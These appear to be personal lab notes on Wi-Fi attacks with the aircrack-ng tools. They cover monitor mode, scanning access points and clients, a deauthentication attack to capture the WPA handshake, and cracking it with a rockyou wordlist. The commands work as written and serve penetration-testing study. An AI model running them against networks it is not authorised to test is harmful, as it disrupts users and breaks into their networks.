Lab Notes

Capture Traffic

Start Traffic

sudo airmon-ng start wlan0

Stop Traffic

sudo airmon-ng stop wlan0

Scanning

sudo airodump-ng wlan0

1. Shows us the MAC address of detected Access Points.

2. The signal power level also tells the target device distance from our Wi-Fi antenna. Higher numbers indicate a better signal.

3. Channel number on which target APs are running.

4. The encryption methods that targets are using.

5. If the target AP advertises themselves with a name, we can see it in this section.

6. MAC address of connected clients to various AP stations. MAC address of various client devices that are connected to APs around.

Specific Target

sudo airodump-ng -d [MAC-Address] --channel [Channel Number] wlan0

---

De-Authentication Attack

Start Scanning APs & Clients

airodump-ng wlan0mon -w ~/wifi/output_file -c [Channel Number] --wps

Captrue 4-way handshake

aireplay-ng -0 10 -a [MAC-Address] wlan0mon

Cracking using aircrack-ng & rockyou

aircrack-ng ~/wifi/output_file.cap -w ~/rockyou-top100000.txt

---